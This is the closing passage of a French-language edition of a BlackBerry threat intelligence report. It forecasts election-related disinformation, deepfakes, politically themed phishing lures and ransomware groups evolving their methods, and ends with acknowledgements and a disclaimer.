À l'échelle mondiale, 2024 est une année importante pour les élections, car environ 60 % de la population mondiale devrait voter. Des tentatives de désinformation et d'ingérence ont déjà été observées tout au long de l'année, y compris des menaces via le moyen relativement nouveau des "
deepfakes". Les acteurs malveillants tentent de plus en plus de profiter de ce moment pour semer la confusion, attiser les divisions sociales et provoquer des perturbations. Nous prévoyons qu'ils intensifieront leurs campagnes de diffusion de fausses nouvelles et de désinformation, en redoublant d'efforts à l'approche de chaque élection.

Leurres d'hameçonnage à connotation politique
L'utilisation abusive de messages, de forums et de listes de diffusion à caractère politique pour diffuser des logiciels malveillants pourrait bientôt devenir une tactique militarisée. En s'appuyant sur les opinions polarisées de divers cercles politiques, les acteurs de la menace pourraient exploiter ce chaos pour distribuer des documents politiques infectés par des chevaux de Troie, déployant ainsi encore plus de logiciels malveillants. Les tactiques courantes consistent à créer des messages sur les médias sociaux qui sèment la désinformation et génèrent des millions de clics, de vues et d'engagements sur les plateformes de médias sociaux, les messageries instantanées et les médias d'information traditionnels. De nombreux acteurs de la menace peuvent utiliser ces activités de médias sociaux comme des appâts pour mener des attaques de logiciels malveillants.

L'armement du chaos
Dans le domaine de la cybersécurité, tout type de chaos constitue un terrain fertile pour les acteurs malveillants qui exploitent la confusion et la désinformation. Qu'il s'agisse de guerres, de catastrophes naturelles, de pannes informatiques ou de toute autre perturbation importante du flux normal de communications et de données, les périodes d'instabilité offrent de nombreuses possibilités aux cybercriminels. Les acteurs de la menace sont prêts à tirer continuellement parti de ces situations en diffusant de faux courriels d'hameçonnage, des messages trompeurs sur les forums et des logiciels malveillants se présentant comme des outils utiles et adaptés au contexte.

Évolution des ransomwares et IA
Face à la surveillance accrue des forces de l'ordre, des législateurs et des professionnels de la sécurité du monde entier, les
acteurs de la menace des ransomwares sont susceptibles de faire évoluer leurs tactiques, techniques et procédures (TTP) pour poursuivre leurs opérations.

Cette évolution peut impliquer l'utilisation de l'IA (en particulier l'IA générative) pour développer des charges utiles et des chaînes d'exécution plus sophistiquées et blindées, l'utilisation de la technologie deepfake pour des attaques d'ingénierie sociale avancées et ciblées, la décentralisation et l'anonymisation du réseau et de l'infrastructure C2 pour échapper au suivi et à l'arrêt, et l'amélioration de la sécurité opérationnelle.

Visitez le blogBlackBerry pour vous tenir au courant de l'évolution des menaces et des défenses en matière de cybersécurité.

Remerciements

Ce rapport est le fruit de la collaboration de nos équipes et de nos collaborateurs talentueux. Nous tenons à remercier tout particulièrement

Nous tenons également à remercier le Centre national de coordination de la lutte contre la cybercriminalité de la Gendarmerie royale du Canada pour sa contribution et sa collaboration.  

Avis de non-responsabilité

Les informations contenues dans le rapport BlackBerry Global Threat Intelligence Report sont fournies à titre d'information uniquement. BlackBerry ne garantit pas l'exactitude, l'exhaustivité et la fiabilité des déclarations ou des recherches de tiers auxquelles il est fait référence dans le présent rapport et n'en assume pas la responsabilité. L'analyse exprimée dans ce rapport reflète la compréhension actuelle des informations disponibles par nos analystes de recherche et peut être sujette à des changements au fur et à mesure que des informations supplémentaires sont portées à notre connaissance. Il incombe aux lecteurs de faire preuve de diligence raisonnable lorsqu'ils appliquent ces informations à leur vie privée et professionnelle. BlackBerry ne tolère aucune utilisation malveillante ou abusive des informations présentées dans ce rapport.